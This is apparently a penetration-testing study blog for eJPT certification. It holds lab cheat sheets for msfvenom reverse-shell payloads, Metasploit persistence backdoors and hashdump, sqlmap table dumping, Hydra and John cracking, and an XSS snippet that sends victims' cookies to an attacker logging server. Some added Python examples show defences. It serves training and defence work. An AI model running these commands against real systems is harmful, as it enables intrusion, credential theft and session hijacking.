Thursday, April 30, 2020

[eJPT][metasploit][msfvenom][meterpreter]msfvenom -- the backdoor function of Metasploit

#Reference: https://nitesculucian.github.io/2018/07/24/msfvenom-cheat-sheet/


*****Generate the server side:*****
# msfvenom -l encoders
...
x86/shikata_ga_nai
...

# msfvenom -l payloads
...
linux/x86/meterpreter_reverse_tcp
...

# msfvenom -l formats
...
elf
elf-so
exe
...

# msfvenom -p linux/x86/meterpreter_reverse_tcp lhost=xxx.xxx.xxx.xxx lport=xxxxx -e x86/shikata_ga_nai -i 5 -f elf -o ./test.out


*****The client side:*****
# /etc/init.d/postgresql start

# msfconsole
msf5> use exploit/multi/handler

msf5> search type:payload platform:linux

msf5> set payload payload/linux/x64/meterpreter_reverse_tcp
(The handler's payload, including its x86/x64 architecture, and its LHOST/LPORT must match what msfvenom embedded in the binary; the file above was built with linux/x86/meterpreter_reverse_tcp, so the handler has to be set to the same payload.)

msf5> set LHOST xxx.xxx.xxx.xxx

msf5> exploit -j

msf5> sessions -l

[certificate]ISO 22301 LA


Saturday, April 25, 2020

[eJPT]Add a route in Kali

root@demonalex:~# ip route add 172.16.88.0/24 via 10.175.34.1

root@demonalex:~# netstat -rn
Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
...
172.16.88.0     10.175.34.1     255.255.255.0   UG        0 0          0 tap0
...

root@demonalex:~# nmap -sn -n 172.16.88.0/24
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-25 11:57 EDT
Nmap scan report for 172.16.88.1
Host is up (0.059s latency).
Nmap scan report for 172.16.88.81
Host is up (0.062s latency).
Nmap done: 256 IP addresses (2 hosts up) scanned in 5.87 seconds

Friday, April 24, 2020

[eJPT][metasploit][msfconsole]Metasploit Msfconsole Gameplay

#################################################Basic Gameplay
#/etc/init.d/postgresql start
#msfconsole
>search type:exploit platform:windows               <--Find the appropriate exploit
>use XX
>show options
...
>set XXX XXX
...
>show payloads
>set payload windows/meterpreter/reverse_tcp        <--Select a payload
>set LHOST XXX.XXX.XXX.XXX
>set EXITFUNC process
>run                                                <--Exploit
...
meterpreter>getuid
meterpreter>getsystem                               <--Privilege Escalation
meterpreter>getuid
meterpreter>background
>sessions -l
...



#################################################Install Persistent Backdoor
>use exploit/windows/local/persistence
>show options
...
>set reg_name XXX
>set exe_name XXX
>set startup SYSTEM
>set session 1
>set payload windows/meterpreter/reverse_tcp
>set exitfunc process
>set lhost XXX.XXX.XXX.XXX
>set lport XXXX
>set DisablePayloadHandler false
>exploit                                           <--Install a backdoor. Use exploit -j instead if not working.
...
>use exploit/multi/handler
>set lhost XXX.XXX.XXX.XXX
>set lport XXXX
>set payload windows/meterpreter/reverse_tcp
>exploit -j                                       <--Launch the backdoor client, namely Handler



#################################################Crack Passwords
>sessions -l
>sessions -i 1
meterpreter>hashdump                              <--Dump the password hashes of all local accounts. Save the output to a file and crack it with John.



#################################################Search and Download Files
meterpreter>search -f congrats.txt
meterpreter>download 'c:\Documents and Settings\eLSAdmin\My Documents\Congrats.txt' /root/

[eJPT][enum4linux][smbclient]Null Session

1) Use "enum4linux -n" to check whether the "<20>" NetBIOS name (the File Server service) exists:
#enum4linux -n 192.168.1.10

2) If "<20>" exists, a Null Session may be possible. Use the following command to get more details:
#enum4linux 192.168.1.10

3) If a Null Session is confirmed, you can remotely list all shares of the target:
#smbclient -L WORKGROUP -I 192.168.1.10 -N -U ""

4) You can also connect to a share on the remote server with the following command:
#smbclient \\\\192.168.1.10\\c$ -N -U ""

5) Download those files stored on the share drive:
smb: \> get Congratulations.txt

Thursday, April 23, 2020

[eJPT][sqlmap]SQLMap Usage

1) First, find the injection point (the vulnerable parameter), such as http://10.124.211.96/newsdetails.php?id=26.


2) Second, determine the databases:
# sqlmap -u http://10.124.211.96/newsdetails.php?id=26 --dbs
----------------------------------------------------------------------------
[13:29:06] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 4.1
[13:29:07] [INFO] fetching database names
available databases [2]:
[*] awd
[*] information_schema
----------------------------------------------------------------------------


3) Third, determine tables:
# sqlmap -u http://10.124.211.96/newsdetails.php?id=26 -D awd --tables
----------------------------------------------------------------------------
[13:30:37] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 4.1
[13:30:37] [INFO] fetching tables for database: 'awd'
Database: awd
[3 tables]
+----------+
| accounts |
| awards   |
| news     |
+----------+
----------------------------------------------------------------------------


4) Fourth, dump a table's data:
# sqlmap -u http://10.124.211.96/newsdetails.php?id=26 -D awd -T accounts --dump
----------------------------------------------------------------------------
Database: awd
Table: accounts
[11 entries]
+------+-----------------------------------------------------+-------------+-------------------+
| id   | email                                               | password    | displayname       |
+------+-----------------------------------------------------+-------------+-------------------+
| 1    | admin@awdmgmt.labs                                  | S3cr3tBOFH  | Admin             |
| 2    | porta.elit.a@adipiscingMaurismolestie.net           | VUH74DYX6DO | Mallory Reed      |
...
----------------------------------------------------------------------------


5) Fifth, if the vulnerable page requires authentication, pass the session cookie along with the scan command:
# sqlmap -u http://10.124.211.96/newsdetails.php?id=26 -D awd -T accounts -p id --cookie="session_level7a=eyJ1c2VyIjoiYWRtaW4ifQ.YSLwbA.3Bixl9Opr1vJ6WU4YLZZUohhDPw" --dump
...
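The steps above drive sqlmap against the id parameter; the added example below (not part of the original post) shows the server-side pattern that makes such a parameter injectable and the parameterized query that fixes it. It uses an in-memory SQLite table standing in for the "news" table of the "awd" database; the table name, rows and function names are constructed for this example.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    # Constructed stand-in for the 'awd' database: an in-memory SQLite table
    # playing the role of the 'news' table behind newsdetails.php
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT)")
    conn.executemany(
        "INSERT INTO news VALUES (?, ?)",
        [(25, "Old notice"), (26, "Award ceremony"), (27, "Draft")],
    )
    return conn


def news_vulnerable(conn: sqlite3.Connection, raw_id: str) -> list:
    # The query-string value is spliced into the SQL text. This is the
    # pattern sqlmap detects on ?id=26 and then drives to enumerate
    # databases, tables and rows.
    cur = conn.execute("SELECT id, title FROM news WHERE id = " + raw_id)
    return cur.fetchall()


def news_safe(conn: sqlite3.Connection, raw_id: str) -> list:
    # Defence: validate the type first, then bind the value through a
    # placeholder so it can only ever be data, never part of the SQL.
    try:
        news_id = int(raw_id)
    except ValueError:
        return []
    cur = conn.execute("SELECT id, title FROM news WHERE id = ?", (news_id,))
    return cur.fetchall()


if __name__ == "__main__":
    db = build_db()
    print("expected:  ", news_vulnerable(db, "26"))
    print("tautology: ", news_vulnerable(db, "26 OR 1=1"))  # every row leaks
    print("hardened:  ", news_safe(db, "26 OR 1=1"))        # rejected
```

The tautology input is the simplest form of what an injection tool probes for; with the placeholder version the same input is rejected before it ever reaches the database, and even a numeric-looking value cannot change the query's structure.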

Wednesday, April 22, 2020

[eJPT][eCPPT]Hijack Cookie through XSS

There are four components as follows:
- Attacker Client PC
- Attacker Logging Server
- Vulnerable Server
- Victim Client PC


1) Attacker: first finds a Vulnerable Server and its injection point.

2) Attacker: enters the following snippet in order to hijack the cookie kept by the Victim Client PC (P.S.: the IP address, 192.168.99.102, belongs to the Attacker Logging Server in this example):
<script>var i = new Image();i.src="http://192.168.99.102/log.php?q="+document.cookie;</script>

3) Attacker: log into Attacker Logging Server (P.S.: it is 192.168.99.102 in this example), and execute the following command:
#nc -vv -k -l -p 80 >> /root/xss.log

4) Attacker: when Victim Client PC browses the Vulnerable Server, check the output of the command above.

5) Attacker: after obtaining the victim's cookie, use a browser add-on to replace the attacker's own cookie with the victim's in order to take over the victim's session. Among others, the add-on EditThisCookie works with Chromium, and Cookie Quick Manager works with Firefox.
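The snippet in step 2 only works because the vulnerable page echoes input without encoding it and because the session cookie is readable from JavaScript. The added example below (not part of the original post) shows both defences side by side with the vulnerable rendering: HTML-escaping output so the injected tag is displayed rather than executed, and issuing the session cookie with HttpOnly, Secure and SameSite so document.cookie cannot read it. The function names and the cookie value are constructed for this example.

```python
import html
from http.cookies import SimpleCookie

# The payload from step 2, as a visitor might submit it in a form field
INJECTED = ('<script>var i = new Image();'
            'i.src="http://192.168.99.102/log.php?q="+document.cookie;</script>')


def render_vulnerable(comment: str) -> str:
    """Reflects user input straight into the page: the browser runs the script."""
    return "<p>Comment: " + comment + "</p>"


def render_hardened(comment: str) -> str:
    """Escapes <, >, &, quotes so the browser shows the text instead of running it."""
    return "<p>Comment: " + html.escape(comment, quote=True) + "</p>"


def contains_active_script(page: str) -> bool:
    """Crude check used only to compare the two renderers above."""
    return "<script>" in page.lower()


def session_cookie_header(value: str, hardened: bool = True) -> str:
    """Build a Set-Cookie header value.

    With hardened=True the cookie is unreadable from JavaScript (HttpOnly),
    sent only over HTTPS (Secure) and not attached to cross-site requests
    (SameSite=Lax), so the exfiltration in step 2 gets nothing useful.
    """
    c = SimpleCookie()
    c["session"] = value
    if hardened:
        c["session"]["httponly"] = True
        c["session"]["secure"] = True
        c["session"]["samesite"] = "Lax"
        c["session"]["path"] = "/"
    return c["session"].OutputString()


if __name__ == "__main__":
    print(render_vulnerable(INJECTED))
    print(render_hardened(INJECTED))
    print(session_cookie_header("abc123", hardened=False))
    print(session_cookie_header("abc123"))
```

Output encoding stops the injection in the first place; HttpOnly limits the damage if an encoding bug slips through, which is why both belong on the same page.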

Tuesday, April 21, 2020

[eJPT][Nessus]Installing Nessus v8.10 on 20200421

1) Download the deb file of Nessus from "https://www.tenable.com/downloads/nessus?loginAttempted=true", and store the deb file at /usr/local/sbin.

2) Install it as shown below:
#cd /usr/local/sbin
#dpkg -i ./Nessus-8.10.0-debian6_i386.deb

3) Start Nessus:
#/etc/init.d/nessusd start

4) Open a browser and access "https://127.0.0.1:8834".

5) When the web portal comes up, select "Nessus Essentials" and fill in the form to request an Activation Code. Enter the Activation Code that Tenable sends by email, then create an admin account. The installation is done.

[eJPT]Network Scan with Fping and Nmap

#fping -a -g 192.168.1.0/24 2>/dev/null
#nmap -sn 192.168.1.0/24

Sunday, April 19, 2020

[eJPT][nmap]Windows Share Enumeration

Enumeration under Linux:
#nmblookup -a IP_ADDRESS
#smbclient -L //IP_ADDRESS -N

Enumeration under Windows:
>nbtstat -A IP_ADDRESS
>net view IP_ADDRESS

Enumeration with Nmap:
#ll /usr/share/nmap/scripts/|grep smb-enum-
-rw-r--r-- 1 root root  4846 Jan  9  2019 smb-enum-domains.nse
-rw-r--r-- 1 root root  5931 Jan  9  2019 smb-enum-groups.nse
-rw-r--r-- 1 root root  8045 Jan  9  2019 smb-enum-processes.nse
-rw-r--r-- 1 root root 27262 Jan  9  2019 smb-enum-services.nse
-rw-r--r-- 1 root root 12057 Jan  9  2019 smb-enum-sessions.nse
-rw-r--r-- 1 root root  6923 Jan  9  2019 smb-enum-shares.nse
-rw-r--r-- 1 root root 12531 Jan  9  2019 smb-enum-users.nse
#nmap --script=smb-enum-users 192.168.1.10

Enumeration with Enum4Linux:
#enum4linux 192.168.1.10

Thursday, April 16, 2020

[eJPT]Hydra Basic Usage

Crack Username and Password at the same time:
#hydra -L USERNAME_LIST.txt -P PASSWORD_LIST.txt PROTOCOL://IP
example:
#hydra -L /usr/share/wordlists/accounts.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.0.1

Only crack Password:
#hydra -l USERNAME -P PASSWORD_LIST.txt PROTOCOL://IP
example:
#hydra -l root -P /usr/share/wordlists/rockyou.txt telnet://192.168.0.2

Try a username-password pair:
#hydra -l USERNAME -p PASSWORD PROTOCOL://IP
example:
#hydra -l administrator -p 'test123!@#' rdp://192.168.0.3        <--Quote passwords that contain shell metacharacters such as ! and #
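A wordlist attack like the ssh example above leaves a very recognisable trail in the target's auth log: many "Failed password" lines from one source in a short time, often cycling through usernames. The added example below (not part of the original post) parses a constructed /var/log/auth.log excerpt and flags sources that exceed a failure threshold; the log lines, threshold and function names are this example's own assumptions.

```python
import re
from collections import Counter, defaultdict

# Constructed auth.log excerpt (not real log data): one source cycling
# through users the way a wordlist attack does, plus one ordinary login
SAMPLE_AUTH_LOG = """\
Apr 16 10:01:02 host sshd[1201]: Failed password for invalid user admin from 192.168.0.50 port 40212 ssh2
Apr 16 10:01:02 host sshd[1203]: Failed password for root from 192.168.0.50 port 40213 ssh2
Apr 16 10:01:03 host sshd[1205]: Failed password for root from 192.168.0.50 port 40214 ssh2
Apr 16 10:01:03 host sshd[1207]: Failed password for invalid user oracle from 192.168.0.50 port 40215 ssh2
Apr 16 10:01:04 host sshd[1209]: Failed password for invalid user test from 192.168.0.50 port 40216 ssh2
Apr 16 10:01:04 host sshd[1211]: Failed password for root from 192.168.0.50 port 40217 ssh2
Apr 16 10:03:10 host sshd[1250]: Failed password for bob from 10.0.0.7 port 51000 ssh2
Apr 16 10:03:15 host sshd[1250]: Accepted password for bob from 10.0.0.7 port 51000 ssh2
"""

# sshd writes "invalid user" before names that do not exist on the host
FAILED = re.compile(
    r"Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\d{1,3}(?:\.\d{1,3}){3}) port"
)


def failed_logins(log_text: str) -> list:
    """(user, source ip) for every failed password line."""
    return [(m.group("user"), m.group("ip"))
            for line in log_text.splitlines()
            if (m := FAILED.search(line))]


def failures_by_source(log_text: str) -> Counter:
    """How many failed attempts each source address produced."""
    return Counter(ip for _, ip in failed_logins(log_text))


def users_by_source(log_text: str) -> dict:
    """Which usernames each source tried; a long list is the wordlist signature."""
    users = defaultdict(set)
    for user, ip in failed_logins(log_text):
        users[ip].add(user)
    return dict(users)


def flag_bruteforce(log_text: str, threshold: int = 5) -> list:
    """Sources with at least `threshold` failures (a real sensor would count
    per time window), worst offender first."""
    counts = failures_by_source(log_text)
    return [ip for ip, n in counts.most_common() if n >= threshold]


if __name__ == "__main__":
    for ip in flag_bruteforce(SAMPLE_AUTH_LOG):
        print(f"{ip}: {failures_by_source(SAMPLE_AUTH_LOG)[ip]} failures, "
              f"users tried: {sorted(users_by_source(SAMPLE_AUTH_LOG)[ip])}")
```

The same counting logic is what fail2ban-style tooling applies before blocking a source; the single failure from 10.0.0.7 followed by an accepted login is the normal pattern a threshold is meant to leave alone.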

[eJPT]Password Dictionary

https://wiki.skullsecurity.org/Passwords

Monday, April 13, 2020

[eJPT]A security knowledge base called Seclists

#apt-get update
#apt-get install seclists
#cd /usr/share/seclists
#ll

[eJPT]Keepass2 -- A secure password vault

Reference: https://keepass.info/

Install KeePass2 in Kali:
#apt-get update
#apt-get install keepass2

[eJPT]John the Ripper Cheat Sheet

Combine passwd file with shadow file:
# unshadow ./passwd ./shadow > ./crackme

Brute force the combination file:
# john --incremental --users=root ./crackme
OR without specifying any user:
# john --incremental ./crackme

Dictionary Crack:
# john --wordlist=/usr/share/wordlists/rockyou.txt ./crackme
OR with mangling rules applied:
# john --wordlist=/usr/share/wordlists/rockyou.txt --rules ./crackme

Show what has been cracked so far (read from john.pot):
# john --show ./crackme

Crack other file types with John
1) Locate the *2john helpers, which convert an encrypted or password-protected file into a hash John can load:
# locate *2john
2) Extract the hash from an encrypted file (e.g. a RAR archive):
# rar2john ./encrypted.rar > ./encrypted.rar.hash
3) Crack it:
# john --wordlist=/usr/share/wordlists/rockyou.txt ./encrypted.rar.hash

Friday, April 10, 2020

[eJPT]Directory Brute Force

1) OWASP DirBuster
In Kali, execute the following command:
# dirbuster
Enter the target's information and pick a wordlist from /usr/share/dirbuster/wordlists before starting the scan.

2) DirB
In Kali, run the command below:
# dirb https://www.google.com /usr/share/dirb/wordlists/vulns/apache.txt

[python][eJPT] Check HTTP Verbs

#!/usr/bin/python3
# https://github.com/d3m0n4l3x/python/blob/master/toys/check_http_options.py
# Sends an HTTP OPTIONS request and prints the Allow header, which lists the
# verbs the server accepts (useful for spotting PUT/DELETE/TRACE left enabled).
import http.client
import sys


def convert_tuple(tup):
    # (name, value) header tuple -> "name: value"
    return ': '.join(tup)


target = input("Your Target: ")
port = input("TCP Port (default: 80): ")

if port == "":
    port = 80

port = int(port)

# A timeout keeps a filtered port from hanging the script forever
conn = http.client.HTTPConnection(target, port, timeout=10)
try:
    conn.request("OPTIONS", "/")
    r1 = conn.getresponse()
    response = r1.getheaders()
finally:
    conn.close()

for each_item in response:
    # Header names are case-insensitive, so compare the lower-cased name
    if each_item[0].lower() == "allow":
        print(convert_tuple(each_item))
        sys.exit(0)

print("There is no Allow field!")


Wednesday, April 8, 2020

[eJPT]Utilizing HTTPrint to perform Banner Grabbing

httprint is a tool that automates banner grabbing and fingerprinting of web servers.

Examples are shown below:

# httprint -P0 -s /usr/share/httprint/signatures.txt -h 1.2.3.4
# httprint -P0 -s /usr/share/httprint/signatures.txt -h https://1.2.3.4

[eJPT]Connect SSL service with Raw Socket

Two tools are commonly used to open a raw TLS connection to an SSL service: OpenSSL and Ncat.

Examples are shown below:

# openssl s_client -connect mail.google.com:443

# ncat --ssl -vv mail.google.com 443

OpenSSL's output is the more detailed of the two (certificate chain, negotiated cipher and session parameters).

Monday, April 6, 2020

[HTB][eJPT][eCPPT]Nmap Cheat Sheet

1) Network / Host Scan (through ICMP)
Scan a network:
#nmap -sn -n 192.168.1.0/24
Scan the same network segment without using ARP scan:
#nmap -sn -n --disable-arp-ping 192.168.1.0/24


1.5) Network / Host Scan through ARP
Scan a network through ARP with the nping command:
#nping --arp-type ARP 192.168.0.0/24


2) Port Scan (covering TCP & UDP)
TCP Port Scan:
#nmap -Pn -sT -p23,80 192.168.1.80
UDP Port Scan:
#nmap -Pn -sU -p1-10 192.168.1.80


3) Service Scan
OS and service detection against a TCP port of a host:
#nmap -O -sV -sT -p 80 192.168.1.80
OS and service detection against a host through a UDP scan:
#nmap -O -sV -sU 192.168.1.80


4) Vulnerability Scan
Upgrade scripts:
#nmap --script-updatedb
Common Script Scan against an IP:
#nmap -sC 192.168.1.80
Vulnerability Scan:
#nmap --script vuln 10.10.10.40
Run only scripts in the "safe" category against the target:
#nmap --script safe 10.10.10.40
Run all scripts against the target (noisy and slow):
#nmap --script all 10.10.10.40
Vulnerability Scan with SearchSploit's assistance:
#searchsploit -u ; nmap 192.168.1.1 -sV --open -oX ~/nmap.xml ; searchsploit -v --nmap ~/nmap.xml > ./exploits.txt


5) Combination Scan
Scan all ports and corresponding vulnerabilities of multiple IP addresses:
#nmap -sT -sV -O -p- -T4 -sC 192.168.1.100,101,102


6) Sneaky Scan
SYN Scan:
#nmap -sS -sV 192.168.0.80
Decoy Scan:
#nmap -Pn -sT -D 192.168.0.88,172.16.0.13,10.0.0.13,ME 192.168.1.80
Idle Scan (the zombie host, here 192.168.0.251 on TCP port 443, must exist and be idle):
#nmap -p22 -sI 192.168.0.251:443 192.168.0.253


7) Filtering Determination Scan
Detect the presence of a firewall or filtering rules with an ACK ("-sA") scan:
#nmap -sA -p- -T4 -n 192.168.0.0/24
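Several of the commands above write XML with -oX (the searchsploit pipeline relies on it), and the same file is what a defender feeds into an asset inventory. The added example below (not part of the original post) parses a constructed nmap XML sample into a list of open services and flags the ones that still speak cleartext protocols; the sample hosts, ports, product strings and the CLEARTEXT list are this example's own assumptions, not real scan output.

```python
import xml.etree.ElementTree as ET

# Constructed sample of what `nmap -sV -oX nmap.xml 192.168.1.80` writes,
# trimmed to the elements this parser reads; not real scan output
SAMPLE_XML = """\
<nmaprun scanner="nmap" args="nmap -sV -oX nmap.xml 192.168.1.80">
  <host>
    <status state="up"/>
    <address addr="192.168.1.80" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open"/>
        <service name="ssh" product="OpenSSH" version="7.9p1"/>
      </port>
      <port protocol="tcp" portid="23">
        <state state="closed"/>
        <service name="telnet"/>
      </port>
      <port protocol="tcp" portid="80">
        <state state="open"/>
        <service name="http" product="Apache httpd" version="2.4.38"/>
      </port>
      <port protocol="udp" portid="161">
        <state state="open|filtered"/>
        <service name="snmp"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

# Protocols that carry credentials or data unencrypted; an inventory review
# wants these flagged (the set is this example's choice)
CLEARTEXT = {"ftp", "telnet", "http", "pop3", "imap", "smtp"}


def open_services(xml_text: str) -> list:
    """Return one dict per confirmed-open port across all hosts in the XML."""
    root = ET.fromstring(xml_text)
    found = []
    for host in root.findall("host"):
        addr = host.find("address").get("addr")
        for port in host.findall("./ports/port"):
            # "open|filtered" (typical for UDP) is not a confirmed service
            if port.find("state").get("state") != "open":
                continue
            svc = port.find("service")
            product = ""
            if svc is not None:
                product = " ".join(
                    p for p in (svc.get("product"), svc.get("version")) if p)
            found.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name") if svc is not None else "",
                "product": product,
            })
    return found


def cleartext_services(services: list) -> list:
    """Subset of the inventory still exposed over an unencrypted protocol."""
    return [s for s in services if s["service"] in CLEARTEXT]


if __name__ == "__main__":
    inv = open_services(SAMPLE_XML)
    for s in inv:
        print(f'{s["host"]}:{s["port"]}/{s["proto"]}  {s["service"]:<6} {s["product"]}')
    print("cleartext:", [f'{s["port"]}/{s["service"]}' for s in cleartext_services(inv)])
```

Diffing two such inventories taken days apart is a cheap way to notice a port that was not there before, which is the defender's view of the same scan the cheat sheet uses for reconnaissance.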

[eJPT]Discovering a subdomain of a target

Three easy ways to find a target's subdomains:

1) Google Hacking
site:company.com

2) Use https://dnsdumpster.com/

3) Utilize sublist3r
sublist3r -d company.com